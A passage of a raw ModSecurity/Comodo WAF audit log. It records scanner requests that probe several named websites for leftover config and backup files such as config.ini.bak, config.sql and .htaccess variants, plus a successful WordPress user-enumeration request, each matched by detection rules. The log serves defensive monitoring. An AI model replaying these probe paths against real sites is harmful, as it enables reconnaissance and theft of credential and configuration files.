p4=0, p5=63, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8dff9749-Z-- --db273055-A-- [15/Jun/2025:02:56:51.182206 +0530] aE3pG54hb3-ZG-auIyDOPQAAAAg 185.177.72.108 56590 127.0.0.1 7080 --db273055-B-- GET /config.inc.old HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --db273055-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --db273055-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.inc.old"] [unique_id "aE3pG54hb3-ZG-auIyDOPQAAAAg"] Stopwatch: 1749936411179301 2968 (- - -) Stopwatch2: 1749936411179301 2968; combined=1646, p1=345, p2=1243, p3=0, p4=0, p5=57, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --db273055-Z-- --e186a70b-A-- [15/Jun/2025:02:56:52.036091 +0530] aE3pHNlaOcxgn8EdjwOwFgAAAAc 185.177.72.108 56650 127.0.0.1 7080 --e186a70b-B-- GET /config.ini HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e186a70b-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e186a70b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.ini"] [unique_id "aE3pHNlaOcxgn8EdjwOwFgAAAAc"] Stopwatch: 1749936412032871 3275 (- - -) Stopwatch2: 1749936412032871 3275; combined=1956, p1=348, p2=1547, p3=0, p4=0, p5=61, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e186a70b-Z-- --e5adb018-A-- [15/Jun/2025:02:56:52.147079 +0530] aE3pHPCFSLfJixou_W0kzwAAAAY 185.177.72.108 56664 127.0.0.1 7080 --e5adb018-B-- GET /config.ini.bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e5adb018-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e5adb018-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.ini.bak"] [unique_id "aE3pHPCFSLfJixou_W0kzwAAAAY"] Stopwatch: 1749936412143790 3367 (- - -) Stopwatch2: 1749936412143790 3367; combined=1967, p1=375, p2=1535, p3=0, p4=0, p5=57, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e5adb018-Z-- --92b94f1a-A-- [15/Jun/2025:02:56:52.262389 +0530] aE3pHDpSduy_dUF9ffnDyQAAAAU 185.177.72.108 56678 127.0.0.1 7080 --92b94f1a-B-- GET /config.ini.old HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --92b94f1a-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --92b94f1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.ini.old"] [unique_id "aE3pHDpSduy_dUF9ffnDyQAAAAU"] Stopwatch: 1749936412259175 3268 (- - -) Stopwatch2: 1749936412259175 3268; combined=1956, p1=338, p2=1563, p3=0, p4=0, p5=55, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92b94f1a-Z-- --e1d6d63e-A-- [15/Jun/2025:02:56:52.965562 +0530] aE3pHDpSduy_dUF9ffnDygAAAAU 185.177.72.108 56716 127.0.0.1 7080 --e1d6d63e-B-- GET /config.old HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e1d6d63e-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e1d6d63e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.old"] [unique_id "aE3pHDpSduy_dUF9ffnDygAAAAU"] Stopwatch: 1749936412961883 3750 (- - -) Stopwatch2: 1749936412961883 3750; combined=2278, p1=416, p2=1789, p3=0, p4=0, p5=73, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1d6d63e-Z-- --c8a69418-A-- [15/Jun/2025:02:56:53.300894 +0530] aE3pHfBViRrxRfhQ2snRMwAAAAE 185.177.72.108 56746 127.0.0.1 7080 --c8a69418-B-- GET /config.php.bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c8a69418-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c8a69418-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.php.bak"] [unique_id "aE3pHfBViRrxRfhQ2snRMwAAAAE"] Stopwatch: 1749936413296962 4012 (- - -) Stopwatch2: 1749936413296962 4012; combined=2411, p1=413, p2=1918, p3=0, p4=0, p5=80, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c8a69418-Z-- --b687424e-A-- [15/Jun/2025:02:56:53.876840 +0530] aE3pHCQOy0yoNZQ7dslNswAAAAk 167.71.197.1 52750 127.0.0.1 7081 --b687424e-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.gulachi.com X-Real-IP: 167.71.197.1 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: PHPSESSID=n4tqo1ui739nat8frmdkufgl9n; _sfs_id=9a87609554f50c92be8bf2b1676bc1321749936410 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --b687424e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type, X-OptinMonster-ApiKey X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin WPO-Cache-Status: not cached WPO-Cache-Message: This is a REST API request (identified by REST_REQUEST constant) Connection: close Content-Type: application/json; charset=UTF-8 --b687424e-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.gulachi.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3pHCQOy0yoNZQ7dslNswAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936412261879 1615051 (- - -) Stopwatch2: 1749936412261879 1615051; combined=2240, p1=344, p2=1798, p3=0, p4=0, p5=97, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b687424e-Z-- --bded2b5e-A-- [15/Jun/2025:02:56:53.980332 +0530] aE3pHTpSduy_dUF9ffnDywAAAAU 185.177.72.108 56772 127.0.0.1 7080 --bded2b5e-B-- GET /config.php.inc HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bded2b5e-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --bded2b5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.php.inc"] [unique_id "aE3pHTpSduy_dUF9ffnDywAAAAU"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/config.php.inc' not found or unable to stat Stopwatch: 1749936413977172 3214 (- - -) Stopwatch2: 1749936413977172 3214; combined=1861, p1=323, p2=1467, p3=0, p4=0, p5=71, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bded2b5e-Z-- --282d6862-A-- [15/Jun/2025:02:56:54.203082 +0530] aE3pHuQxpfcsz2uNnR-jvwAAAAI 185.177.72.108 56792 127.0.0.1 7080 --282d6862-B-- GET /config.php.old HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --282d6862-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --282d6862-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.php.old"] [unique_id "aE3pHuQxpfcsz2uNnR-jvwAAAAI"] Stopwatch: 1749936414199897 3238 (- - -) Stopwatch2: 1749936414199897 3238; combined=1874, p1=368, p2=1451, p3=0, p4=0, p5=55, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --282d6862-Z-- --f11fed0f-A-- [15/Jun/2025:02:56:54.994439 +0530] aE3pHtlaOcxgn8EdjwOwGgAAAAc 185.177.72.108 56864 127.0.0.1 7080 --f11fed0f-B-- GET /config.sql HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f11fed0f-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f11fed0f-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.sql"] [unique_id "aE3pHtlaOcxgn8EdjwOwGgAAAAc"] Stopwatch: 1749936414991304 3204 (- - -) Stopwatch2: 1749936414991304 3204; combined=1830, p1=344, p2=1429, p3=0, p4=0, p5=57, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f11fed0f-Z-- --6ffa172b-A-- [15/Jun/2025:02:56:56.036078 +0530] aE3pIPCFSLfJixou_W0k1AAAAAY 185.177.72.108 56920 127.0.0.1 7080 --6ffa172b-B-- GET /config.properties.bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6ffa172b-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6ffa172b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/config.properties.bak"] [unique_id "aE3pIPCFSLfJixou_W0k1AAAAAY"] Stopwatch: 1749936416032930 3227 (- - -) Stopwatch2: 1749936416032930 3227; combined=1889, p1=372, p2=1455, p3=0, p4=0, p5=62, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6ffa172b-Z-- --6c5def6c-A-- [15/Jun/2025:02:56:56.063332 +0530] aE3pHiQOy0yoNZQ7dslNtAAAAAk 185.177.72.108 52810 127.0.0.1 7081 --6c5def6c-B-- GET /example.htaccess HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6c5def6c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 WPO-Cache-Status: not cached WPO-Cache-Message: The file path is unsuitable for caching (/example.htaccess) Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --6c5def6c-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/example.htaccess"] [unique_id "aE3pHiQOy0yoNZQ7dslNtAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936414569767 1493632 (- - -) Stopwatch2: 1749936414569767 1493632; combined=1794, p1=434, p2=1250, p3=0, p4=0, p5=110, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6c5def6c-Z-- --5535b83a-A-- [15/Jun/2025:02:56:57.994781 +0530] aE3pINAcUP5X8o425y3XGgAAAAQ 185.177.72.108 52860 127.0.0.1 7081 --5535b83a-B-- GET /_.htaccess HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5535b83a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 WPO-Cache-Status: not cached WPO-Cache-Message: The file path is unsuitable for caching (/_.htaccess) Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --5535b83a-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/_.htaccess"] [unique_id "aE3pINAcUP5X8o425y3XGgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936416513394 1481454 (- - -) Stopwatch2: 1749936416513394 1481454; combined=1708, p1=375, p2=1245, p3=0, p4=0, p5=88, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5535b83a-Z-- --078c0a5c-A-- [15/Jun/2025:02:56:59.920183 +0530] aE3pItlaOcxgn8EdjwOwHgAAAAc 185.177.72.108 52894 127.0.0.1 7081 --078c0a5c-B-- GET /sample.htaccess HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --078c0a5c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 WPO-Cache-Status: not cached WPO-Cache-Message: The file path is unsuitable for caching (/sample.htaccess) Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --078c0a5c-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/sample.htaccess"] [unique_id "aE3pItlaOcxgn8EdjwOwHgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936418445041 1475257 (- - -) Stopwatch2: 1749936418445041 1475257; combined=1641, p1=350, p2=1168, p3=0, p4=0, p5=123, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --078c0a5c-Z-- --0a7b3217-A-- [15/Jun/2025:02:57:00.377343 +0530] aE3pJG1_24bael5AsqHJFgAAAAo 185.177.72.108 57798 127.0.0.1 7080 --0a7b3217-B-- GET /app.config HTTP/1.0 Host: 